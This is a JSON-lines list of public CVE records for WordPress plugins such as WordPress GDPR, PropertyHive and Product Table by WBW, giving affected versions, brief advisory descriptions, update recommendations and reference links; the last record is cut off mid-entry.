{"CVE_ID":"CVE-2024-11069","slug":"wordpress-gdpr","versionImpact":"2.0.2","versionEndExcluding":"2.0.3","description":"The WordPress GDPR plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the 'WordPress_GDPR_Data_Delete::check_action' function in all versions up to, and including, 2.0.2. This makes it possible for unauthenticated attackers to delete arbitrary users.","recommendation":"Update to version 2.0.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a089026a-5da9-467c-a1e4-622bb74363e2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a089026a-5da9-467c-a1e4-622bb74363e2?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.welaunch.io\\\/en\\\/product\\\/wordpress-gdpr\\\/#changelog\",\"name\":\"https:\\\/\\\/www.welaunch.io\\\/en\\\/product\\\/wordpress-gdpr\\\/#changelog\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10388","slug":"wordpress-gdpr","versionImpact":"2.0.2","versionEndExcluding":"2.0.3","description":"The WordPress GDPR plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'gdpr_firstname' and 'gdpr_lastname' parameters in all versions up to, and including, 2.0.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.0.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bf707d9b-2b96-4d1b-b798-38f7fe958eaf?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bf707d9b-2b96-4d1b-b798-38f7fe958eaf?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.welaunch.io\\\/en\\\/product\\\/wordpress-gdpr\\\/#changelog\",\"name\":\"https:\\\/\\\/www.welaunch.io\\\/en\\\/product\\\/wordpress-gdpr\\\/#changelog\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36738","slug":"cool-timeline","versionEndExcluding":"2.0.3","description":"The Cool Timeline (Horizontal & Vertical Timeline) plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.0.2. This is due to missing or incorrect nonce validation on the ctl_save() function. This makes it possible for unauthenticated attackers to save field icons via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1ce7c895-e94c-46bd-9de1-f5fde29c3475?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1ce7c895-e94c-46bd-9de1-f5fde29c3475?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2368335\\\/cool-timeline\\\/trunk\\\/fa-icons\\\/fa-icons-class.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2368335\\\/cool-timeline\\\/trunk\\\/fa-icons\\\/fa-icons-class.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1977","slug":"booking-manager","versionEndExcluding":"2.0.29","description":"The Booking Manager WordPress plugin before 2.0.29 does not validate URLs input in its admin panel or in shortcodes for showing events from a remote .ics file, allowing an attacker with privileges as low as Subscriber to perform SSRF attacks on the site's internal network.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/842f3b1f-395a-4ea2-b7df-a36f70e8c790\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/842f3b1f-395a-4ea2-b7df-a36f70e8c790\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12413","slug":"marketking-multivendor-marketplace-for-woocommerce","versionImpact":"2.0.00","versionEndExcluding":"2.0.25","description":"The MarketKing \u2014 Ultimate WooCommerce Multivendor Marketplace Solution plugin for WordPress is vulnerable to unauthorized access due to missing capability checks on several functions like 'marketking_delete_team_member', 'marketkingrejectuser', 'marketking_save_profile_settings', and many more in all versions up to, and including, 2.0.00. This makes it possible for unauthenticated attackers to delete users, update settings, approve users, and more.","recommendation":"Update to version 2.0.25, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3212032\\\/marketking-multivendor-marketplace-for-woocommerce\\\/trunk\\\/includes\\\/class-marketking-core.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3212032\\\/marketking-multivendor-marketplace-for-woocommerce\\\/trunk\\\/includes\\\/class-marketking-core.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3cb809c9-7167-4333-969f-0141c96342bd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3cb809c9-7167-4333-969f-0141c96342bd?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6700","slug":"wp-gdpr-compliance","versionImpact":"2.0.22","versionEndExcluding":"2.0.23","description":"The Cookie Information | Free GDPR Consent Solution plugin for WordPress is vulnerable to arbitrary option updates due to a missing capability check on its AJAX request handler in versions up to, and including, 2.0.22. This makes it possible for authenticated attackers, with subscriber-level access or higher, to edit arbitrary site options which can be used to create administrator accounts.","recommendation":"Update to version 2.0.23, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/42a4ef37-c842-4925-b06a-3e6423337567?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/42a4ef37-c842-4925-b06a-3e6423337567?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3028096\\\/wp-gdpr-compliance\\\/trunk?contextall=1&old=2865555&old_path=%2Fwp-gdpr-compliance%2Ftrunk\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3028096\\\/wp-gdpr-compliance\\\/trunk?contextall=1&old=2865555&old_path=%2Fwp-gdpr-compliance%2Ftrunk\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6460","slug":"tradedoubler-affiliate-tracker","versionImpact":"2.0.21","versionEndExcluding":"2.0.22","description":"The Grow by Tradedoubler WordPress plugin through 2.0.21 is vulnerable to Local File Inclusion via the component parameter. This makes it possible for attackers to include and execute PHP files on the server, allowing the execution of any PHP code in those files.","recommendation":"Update to version 2.0.22, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ba2f53e0-30be-4f37-91bc-5fa151f1eee7\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ba2f53e0-30be-4f37-91bc-5fa151f1eee7\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5637","slug":"market-exporter","versionImpact":"2.0.19","versionEndExcluding":"2.0.20","description":"The Market Exporter plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the 'remove_files' function in all versions up to, and including, 2.0.19. This makes it possible for authenticated attackers, with Subscriber-level access and above, to use path traversal to delete arbitrary files on the server.","recommendation":"Update to version 2.0.20, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c3ea4bf9-e109-465e-890a-c2923089fb66?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c3ea4bf9-e109-465e-890a-c2923089fb66?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/market-exporter\\\/trunk\\\/includes\\\/class-restapi.php#L427\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/market-exporter\\\/trunk\\\/includes\\\/class-restapi.php#L427\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3098360\\\/market-exporter\\\/trunk\\\/includes\\\/class-restapi.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3098360\\\/market-exporter\\\/trunk\\\/includes\\\/class-restapi.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8490","slug":"propertyhive","versionImpact":"2.0.19","versionEndExcluding":"2.0.20","description":"The PropertyHive plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.0.19. This is due to missing or incorrect nonce validation on the 'save_account_details' function. This makes it possible for unauthenticated attackers to edit the name, email address, and password of an administrator account via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 2.0.20, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/17c06c83-6707-4233-a1c3-ef4cdcf93982?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/17c06c83-6707-4233-a1c3-ef4cdcf93982?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/propertyhive\\\/tags\\\/2.0.19\\\/includes\\\/class-ph-ajax.php#L1089\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/propertyhive\\\/tags\\\/2.0.19\\\/includes\\\/class-ph-ajax.php#L1089\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/propertyhive\\\/tags\\\/2.0.19\\\/includes\\\/class-ph-ajax.php#L976\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/propertyhive\\\/tags\\\/2.0.19\\\/includes\\\/class-ph-ajax.php#L976\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3152548\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3152548\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12338","slug":"website-toolbox-forums","versionImpact":"2.0.1","versionEndExcluding":"2.0.2","description":"The Website Toolbox Community plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018websitetoolbox_username\u2019 parameter in all versions up to, and including, 2.0.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 2.0.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/website-toolbox-forums\\\/trunk\\\/admin\\\/admin.php#L249\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/website-toolbox-forums\\\/trunk\\\/admin\\\/admin.php#L249\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/eae14ac7-ebc1-45a1-b0dd-fec2bbb14460?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/eae14ac7-ebc1-45a1-b0dd-fec2bbb14460?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6673","slug":"easy-pdf-restaurant-menu-upload","versionImpact":"2.0.1","versionEndExcluding":"2.0.2","description":"The Easy restaurant menu manager plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's nsc_eprm_menu_link shortcode in versions up to, and including 2.0.1, due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.0.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-pdf-restaurant-menu-upload\\\/tags\\\/2.0.0\\\/class\\\/class_admin_easy_pdf_restaurant_menu.php#L68\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-pdf-restaurant-menu-upload\\\/tags\\\/2.0.0\\\/class\\\/class_admin_easy_pdf_restaurant_menu.php#L68\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3318491\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3318491\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/382de43a-a714-4538-be12-76e74ad77327?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/382de43a-a714-4538-be12-76e74ad77327?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6365","slug":"woo-product-tables","versionImpact":"2.0.1","versionEndExcluding":"2.0.2","description":"The Product Table by WBW plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 2.0.1 via the 'saveCustomTitle' function. This is due to missing authorization and lack of sanitization of appended data in the languages\/customTitle.php file. This makes it possible for unauthenticated attackers to execute code on the server.","recommendation":"Update to version 2.0.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ba84711f-bdbe-46d3-a9a3-cc2b1dcefd1a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ba84711f-bdbe-46d3-a9a3-cc2b1dcefd1a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-product-tables\\\/trunk\\\/modules\\\/wootablepress\\\/models\\\/wootablepress.php#L7\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-product-tables\\\/trunk\\\/modules\\\/wootablepress\\\/models\\\/wootablepress.php#L7\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-product-tables\\\/trunk\\\/languages\\\/customTitle.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-product-tables\\\/trunk\\\/languages\\\/customTitle.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3113335\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3113335\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8797","slug":"wp-booking-system","versionImpact":"2.0.19.8","versionEndExcluding":"2.0.19.9","description":"The WP Booking System \u2013 Booking Calendar plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg & remove_query_arg without appropriate escaping on the URL in all versions up to, and including, 2.0.19.8. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 2.0.19.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1bea55b5-b2d7-4eaf-8868-d2645ce18619?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1bea55b5-b2d7-4eaf-8868-d2645ce18619?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-booking-system\\\/tags\\\/2.0.19.10\\\/includes\\\/modules\\\/update-checker\\\/views\\\/view-register-website.php#L21\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-booking-system\\\/tags\\\/2.0.19.10\\\/includes\\\/modules\\\/update-checker\\\/views\\\/view-register-website.php#L21\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3150487%40wp-booking-system&new=3150487%40wp-booking-system&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3150487%40wp-booking-system&new=3150487%40wp-booking-system&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3761","slug":"my-tickets","versionImpact":"2.0.16","versionEndExcluding":"2.0.17","description":"The My Tickets \u2013 Accessible Event Ticketing plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 2.0.16. This is due to the mt_save_profile() function not appropriately restricting access to unauthorized users to update roles. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update their role to that of an administrator.","recommendation":"Update to version 2.0.17, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3280248\\\/my-tickets\\\/trunk\\\/my-tickets.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3280248\\\/my-tickets\\\/trunk\\\/my-tickets.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6d875c23-3d8a-4f82-bea3-1c46b5045d94?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6d875c23-3d8a-4f82-bea3-1c46b5045d94?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10695","slug":"futurio-extra","versionImpact":"2.0.13","versionEndExcluding":"2.0.14","description":"The Futurio Extra plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 2.0.13 via the 'elementor-template' shortcode due to insufficient restrictions on which posts can be included. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract data from private or draft posts that they should not have access to.","recommendation":"Update to version 2.0.14, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/53871750-6437-459f-97e1-5cf524160f09?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/53871750-6437-459f-97e1-5cf524160f09?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3184380%40futurio-extra&new=3184380%40futurio-extra&sfp_email=&sfph_mail=#file3\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3184380%40futurio-extra&new=3184380%40futurio-extra&sfp_email=&sfph_mail=#file3\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2015-10127","slug":"pluscaptcha","versionImpact":"2.0.6","versionEndExcluding":"2.0.14","description":"A vulnerability was found in PlusCaptcha Plugin up to 2.0.6 on WordPress and classified as problematic. Affected by this issue is some unknown functionality. The manipulation leads to cross site scripting. The attack may be launched remotely. Upgrading to version 2.0.14 is able to address this issue. The patch is identified as 1274afc635170daafd38306487b6bb8a01f78ecd. It is recommended to upgrade the affected component. VDB-248954 is the identifier assigned to this vulnerability.","recommendation":"Update to version 2.0.14, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/vuldb.com\\\/?id.248954\",\"name\":\"https:\\\/\\\/vuldb.com\\\/?id.248954\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/vuldb.com\\\/?ctiid.248954\",\"name\":\"https:\\\/\\\/vuldb.com\\\/?ctiid.248954\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/pluscaptcha\\\/commit\\\/1274afc635170daafd38306487b6bb8a01f78ecd\",\"name\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/pluscaptcha\\\/commit\\\/1274afc635170daafd38306487b6bb8a01f78ecd\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3524","slug":"insert-headers-and-footers","versionEndExcluding":"2.0.13.1","description":"The WPCode WordPress plugin before 2.0.13.1 does not escape generated URLs before outputting them in attributes, leading to Reflected Cross-Site Scripting","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/89570379-769b-4684-b8a7-28c37b408e5d\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/89570379-769b-4684-b8a7-28c37b408e5d\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-8604","slug":"wp-table-builder","versionImpact":"2.0.12","versionEndExcluding":"2.0.13","description":"The WP Table Builder \u2013 WordPress Table Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's wptb shortcode in all versions up to, and including, 2.0.12 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.0.13, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-table-builder\\\/trunk\\\/inc\\\/admin\\\/class-tables.php#L153\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-table-builder\\\/trunk\\\/inc\\\/admin\\\/class-tables.php#L153\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3341699%40wp-table-builder%2Ftrunk&old=3336979%40wp-table-builder%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3341699%40wp-table-builder%2Ftrunk&old=3336979%40wp-table-builder%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-table-builder\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-table-builder\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ac2f6549-016f-494d-99a4-52a1527f1fd2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ac2f6549-016f-494d-99a4-52a1527f1fd2?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3607","slug":"propertyhive","versionImpact":"2.0.12","versionEndExcluding":"2.0.13","description":"The PropertyHive plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the delete_key_date() function in all versions up to, and including, 2.0.12. This makes it possible for authenticated attackers, with subscriber-level access and above, to delete arbitrary posts","recommendation":"Update to version 2.0.13, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d8d52ced-807b-48c0-bb7a-e40d143ae5d3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d8d52ced-807b-48c0-bb7a-e40d143ae5d3?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3075163%40propertyhive&new=3075163%40propertyhive&sfp_email=&sfph_mail=#file11\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3075163%40propertyhive&new=3075163%40propertyhive&sfp_email=&sfph_mail=#file11\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10872","slug":"getwid","versionImpact":"2.0.12","versionEndExcluding":"2.0.13","description":"The Getwid \u2013 Gutenberg Blocks plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the `template-post-custom-field` block in all versions up to, and including, 2.0.12 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.0.13, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8ae0030f-af21-43fb-959a-8da04cab05bb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8ae0030f-af21-43fb-959a-8da04cab05bb?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/getwid\\\/trunk\\\/includes\\\/templates\\\/template-parts\\\/post-custom-field.php#L9\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/getwid\\\/trunk\\\/includes\\\/templates\\\/template-parts\\\/post-custom-field.php#L9\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3188812#file1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3188812#file1\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9354","slug":"estatik-mortgage-calculator","versionImpact":"2.0.11","versionEndExcluding":"2.0.12","description":"The Estatik Mortgage Calculator plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'color' parameter in all versions up to, and including, 2.0.11 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 2.0.12, or a newer patched 